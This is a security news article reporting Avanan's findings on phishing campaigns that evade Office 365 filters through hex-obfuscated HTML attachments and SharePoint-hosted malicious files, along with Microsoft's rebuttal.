Application security, Threat Management, Malware, Phishing

Recent phishing attacks reportedly capitalize on Office 365 security holes

Researchers from cloud security company Avanan have reported finding two ways that phishers are evading Microsoft Office 365 Security protections: one using "hexidecimal escape characters" to conceal coding and links, and the other by compromising SharePoint files.

The first method involves emails with an HTML attachment that contain a small excerpt of JavaScript that is obscured in hexadecimal escape characters. "Therefore, no links are visible, but when opened, it presents a locally-generated phishing page with login instructions," the company explains in an Aug. 24 blog post.

In one recent example, Avanan came across a phishing email, purportedly sent by PayPal, that displayed a fraudulent login page, asking for account information such as name, address, phone number and password. By entering the information and clicking a submit button, the recipient unknowingly transmits his or her information to the cybercriminals.

Avanan reports that these emails are good at evading detection because their malicious links are hidden, the fake login-page is locally produced, and sandbox technologies generally don't consider HTML files with a submit button as suspicious. 

According to a second Avanan blog post, the attack that abuses SharePoint generally involves an email that leverages "a genuine invoice from a commonly used online site, with a publicly open link to Office 365 SharePoint," which is a web-based, collaborative platform for Microsoft Office users. Clicking the link executes a JavaScript-based file that infects the endpoint.

Avanan claims that the phishing emails elude detection because Microsoft assumes SharePoint files are safe, as Microsoft originally developed the application. "Most people would assume that files on SharePoint and OneDrive would be scanned for malware, but the fact is that the scanning tools Microsoft uses for Office 365 are not used for files within SharePoint and OneDrive files. Even if the malware is identified once, the same file in a different location in SharePoint will not be blocked," Avanan has reported.

“We disagree with Avanan's claims," said a Microsoft spokesperson in a statement emailed to SC Media. "Microsoft's filters do not rely on the specific techniques described in the vendor post, and our solutions regularly detect and flag these kinds of attacks. In addition, we always encourage customers to use caution when clicking on links and opening emails from unknown senders.”

Avanan suspects that Chinese cybercriminals may be behind the SharePoint operation, due to use of a malicious domain that was registered this week from China.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.